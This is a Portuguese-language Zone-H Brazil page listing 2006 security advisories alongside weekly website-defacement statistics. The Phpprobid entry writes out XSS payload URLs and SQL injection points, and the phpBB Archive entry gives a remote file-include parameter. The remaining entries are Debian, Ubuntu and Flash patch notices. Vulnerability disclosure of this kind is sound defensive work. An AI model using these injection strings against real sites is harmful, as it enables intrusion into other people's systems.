Zone-H
Home arrow Avisos de Segurança
03 de December de 2008
  
 
Ataques desta semana
O.S.  Defs.  %
Linux  4747  66.95%
Win 2003  1457  20.55%
Solaris 9/10  351  4.95%
FreeBSD  229  3.23%
Win 2000  164  2.31%
Other  142  2.00%

Total de ataques: 7090 dos quais 3494 único(s) no ip e 3596 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Área de Download
Zone-H.org
Área de download
Avisos de Segurança
Phpprobid Falhas de XSS e SQL injection Imprimir E-mail
Avaliação do Usuário: / 0
Por Marcelo Almeida (Vympel)   
27 de July de 2006
Phpprobid 5.24 http://www.phpprobid.com

Cross Site Scripting (XSS)  http://target.xx/auctionsearch.php?advsrc="<script>alert(/EllipsisSecurityTest/)</script>
http://target.xx/auctionsearch.php?start=1&advsrc="><script>alert(/EllipsisSecurityTest/)</script>

SQL injection
http://target.xx/viewfeedback.php?view=1'[SQL]
http://target.xx/viewfeedback.php?view=all&start=1'[SQL]
http://target.xx/categories.php?parent=&start=&orderField=itemname&orderType=1'[SQL]

Ellipsis Security
http://www.ellsec.org
 
Advanced Poll ver 2.02 (base_path) Inclusão de arquivos remoto Imprimir E-mail
Avaliação do Usuário: / 3
Por Marcelo Almeida (Vympel)   
22 de July de 2006
Advanced Poll ver 2.02 (base_path) Inclusão de arquivos remoto
 
Site do desenvolvedor: http://www.proxy2.de/scripts.php     
Bug encontrado por: Solpot a.k.a (k. Hasibuan)
 
mail: Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo
Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,  L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy home_edition2001 , Rendy ,Tje , m3lky , no-profile and all crew mardongan @ irc.dal.net
Leia mais...
 
DSA - Debian multiplas atualizações Imprimir E-mail
Avaliação do Usuário: / 0
Por Marcelo Almeida (Vympel)   
21 de July de 2006

A Debian liberou hoje correções para os pacotes hashcash e gnugp2. Estas atualizações corrigem o buffer overflow e o interger overflow respectivamente encontrados nestes pacotes.

Para maiores informações:
DSA 1114

 DSA 1115
 
Modulo Archive para PHPBB falha de PHP Include Imprimir E-mail
Avaliação do Usuário: / 6
Por Marcelo Almeida (Vympel)   
20 de July de 2006
Mr. Darkfire descobriu uma falha de file include em um addon para PHPBB.
Este módulo com falha pode fazer um usuário obter acesso remoto ao servidor.

Exemplos da falha:
/archive/archive_topic.php?phpbb_root_path=
 
USN-319-2: Atualização para o Kernel do Linux Imprimir E-mail
Avaliação do Usuário: / 1
Por Marcelo Almeida (Vympel)   
19 de July de 2006
Ubuntu Aviso de Segurança
linux-source-2.6.10, linux-source-2.6.12 CVE-2006-3626

Uma falha de segurança afeta as seguintes versões do Ubuntu:

Ubuntu 5.04
Ubuntu 5.10

Esta falha se aplica a todas as respecitvas versões para:
Kubuntu, Edubuntu, and Xubuntu.

Para corrigir o problema atualiza para os seguintes pacotes:

Ubuntu 5.04:
  linux-image-2.6.10-6-386 2.6.10-34.22
  linux-image-2.6.10-6-686 2.6.10-34.22
  linux-image-2.6.10-6-686-smp 2.6.10-34.22
  linux-image-2.6.10-6-amd64-generic 2.6.10-34.22
...
 

Leia mais...
 
Macromedia Flash Player: Execução de comandos arbitrários Imprimir E-mail
Avaliação do Usuário: / 1
Por Marcelo Almeida (Vympel)   
12 de July de 2006

Foi descoberto pela Fortinet Security Research uma falha de segurança no Macromedia Flash Player que poderia fazer com que um crackers criasse um arquivo .SWF especialmente modificado para executar comandos arbitrários dentro de um computador remoto.
A exploração com sucesso desta falha pode dar ao cracker o acesso total ao sistema.

Versão com falha:  Macromedia Flash player v8.0.24.0

Recomendações:  Instalar a nova versão do Flash Player

Aviso original: Fortinet
 
Mais...
<< Início < Anterior 1 2 3 4 5 6 7 8 9 Próximo > Fim >>

Resultados 209 - 234 de 234
[Voltar]
 
Top!
(C) 2008 Zone-H - Unrestricted Information
Top!